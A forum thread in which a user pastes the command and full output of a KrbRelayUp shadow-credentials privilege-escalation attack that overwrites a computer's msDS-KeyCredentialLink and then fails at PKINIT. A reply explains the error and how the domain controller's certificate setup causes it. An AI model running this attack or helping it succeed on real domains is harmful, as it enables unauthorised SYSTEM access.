While perofrming shadowcred Kerberos errors: KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

[chosenonehacks]

While performing shadowcred Kerberos errors, any ideas on how to move on?

C:\Users\user\Desktop\krbRelayUp>KrbRelayUp.exe full -m shadowcred --ForceShadowCred
KrbRelayUp - Relaying you to SYSTEM

[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[+] KeyCredential generated with DeviceID 5f6ef45f-614b-4795-b02c-4bdfeed9780a
[+] Clearing msDS-KeyCredentialLink before adding our new KeyCredential
[*] ldap_clear: LDAP_SUCCESS
[+] KeyCredential added successfully
[+] Certificate: MIIKR(...)==
[+] Certificate Password: j(...)=
[+] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=<hostname>", OU=<ou>, OU=Servers, OU=ABC, DC=<name>, DC=<domain>
[+] Building AS-REQ (w/ PKINIT preauth) for: '<name>.<domain>\<hostname>$'
**[-] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP**

Unhandled Exception: System.NullReferenceException: Object reference not set to an instance of an object.
   at KrbRelayUp.KRB_CRED..ctor(Byte[] bytes)
   at KrbRelayUp.Program.Main(String[] args)

[tbaker57]

This typically means:

• You don't have a cert on your domain controller with the 'KDC Authentication' EKU, OR
• You do have such a cert, but your CA server is not online (so CRL checks will fail)

Have a look at the event logs on your DC when you attempted PKINIT authentication - if the KDC is missing a suitable certificate you'll see the log

This event indicates an attempt was made to use smartcard logon, but the KDC is unable to use the PKINIT protocol because it is missing a suitable certificate.